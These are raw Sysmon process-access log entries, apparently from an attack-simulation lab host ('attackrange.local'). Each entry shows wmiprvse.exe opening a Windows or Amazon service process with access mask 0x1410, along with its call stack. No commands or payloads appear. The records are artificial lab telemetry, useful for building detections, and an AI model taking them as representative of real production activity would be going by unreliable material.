22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.896{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.874{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 